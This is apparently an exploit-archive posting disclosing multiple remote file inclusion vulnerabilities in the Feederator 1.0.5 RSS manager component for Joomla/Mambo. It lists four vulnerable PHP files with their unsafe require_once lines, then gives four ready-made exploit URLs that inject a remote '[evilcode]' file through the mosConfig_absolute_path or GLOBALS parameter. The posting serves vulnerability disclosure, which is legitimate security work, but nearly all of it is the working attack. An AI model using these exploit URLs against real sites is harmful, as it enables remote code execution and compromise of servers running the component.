Feederator [RSS manager] 1.0.5 - Multiple RFI


[o] Feederator - RSS manager Component 1.0.5 Multiple Remote File Inclusion Vulnerabilities
Software : com_feederator version 1.0.5
Vendor : http://www.recly.com
Download : http://www.recly.com/index.php?option=com_recly&task=product_page&id=2
Author : NoGe


[o] Vulnerable file
administrator/components/com_feederator/includes/tmsp/add_tmsp.php
require_once( $mosConfig_absolute_path . '/components/Recly/Recly_TMSP/Recly_TMSP.class.php' );
administrator/components/com_feederator/includes/tmsp/edit_tmsp.php
require_once( $mosConfig_absolute_path . '/components/Recly/Recly_TMSP/Recly_TMSP.class.php' );
administrator/components/com_feederator/includes/tmsp/subscription.php
require_once($GLOBALS['mosConfig_absolute_path'] . '/components/Recly/common/GlobalVariables.class.php');
administrator/components/com_feederator/includes/tmsp/tmsp.php
require_once( $mosConfig_absolute_path . '/components/Recly/Recly_HTML/Recly_Paginator.class.php' );


[o] Exploit
http://localhost/[path]/administrator/components/com_feederator/includes/tmsp/add_tmsp.php?mosConfig_absolute_path=[evilcode]
http://localhost/[path]/administrator/components/com_feederator/includes/tmsp/edit_tmsp.php?mosConfig_absolute_path=[evilcode]
http://localhost/[path]/administrator/components/com_feederator/includes/tmsp/subscription.php?GLOBALS[mosConfig_absolute_path]=[evilcode]
http://localhost/[path]/administrator/components/com_feederator/includes/tmsp/tmsp.php?mosConfig_absolute_path=[evilcode]